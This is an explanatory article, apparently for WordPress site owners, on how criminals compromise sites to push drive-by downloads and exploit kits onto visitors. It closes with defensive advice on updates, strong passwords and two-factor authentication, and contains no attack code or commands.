In previous articles we’ve talked about why criminals are interested in attacking WordPress sites and some of the methods they use. Today we’re going to look at drive-by downloads, a common category of attack used by criminals to infect site visitors with malware. Drive-by downloads are software downloads made to a device without the permission or knowledge of its owner.
Most such attacks are carried out using the compromised content managements systems of legitimate sites, infecting the site’s visitors with malware that serves the interest of the attacker.
This June, security researchers at Sucuri noticed that a large number of WordPress sites were being used by criminals to infect web users with ransomware, so it’s worth going into some detail about how attacks of this sort work.
When an attacker compromises a WordPress site – usually because the site hasn’t been updated — they’re not necessarily interested in the resources of the site. Instead, they’re interested in the site’s audience. They want to use the site’s popularity to their own advantage, infecting its audience with ransomware, botnet software, software that steals banking and credit card details, and so on.
The first stage in a drive-by download attack is to find a vulnerable WordPress site and to compromise it. When the attackers have control of the site they inject code into its pages and JavaScript files. The exact nature of the code varies, but its basic task is to cause a visitor’s browser to download and execute code installed on a domain the attacker controls. This can be done with a simple redirect to the malicious site, an iFrame, or even an innocuous-looking advert.
The code the attacker wants to load is usually part of an exploit kit. Exploit kits like Nuclear and Angler are complex applications that probe the software on a visitor’s device for vulnerabilities, often in PDF reader and Flash player software. If the exploit kit finds a vulnerability, it compromises the visitor’s device and uploads a small piece of malware, which will typically download the main malware payload. The entire process can take place in less than a second and most people never notice that their device is now controlled by criminals.
So what can WordPress site owners do to minimize the chances that their sites will be compromised and used to infect visitors with malware? Most importantly, keep WordPress (and any other internet-facing software) up-to-date. It’s hard to overstate how important this is. If your site is not updated regularly, it’s almost certainly vulnerable. Themes and plugins should also be updated regularly.
While most WordPress sites are exploited because web hosting clients don’t update, a good number are hacked via simple brute-force attacks. Brute-force attacks only work if a site has easily guessed passwords, so the second most important mitigation advice is to use long, random, complex passwords. For extra safety, think about implementing two-factor authentication on your site.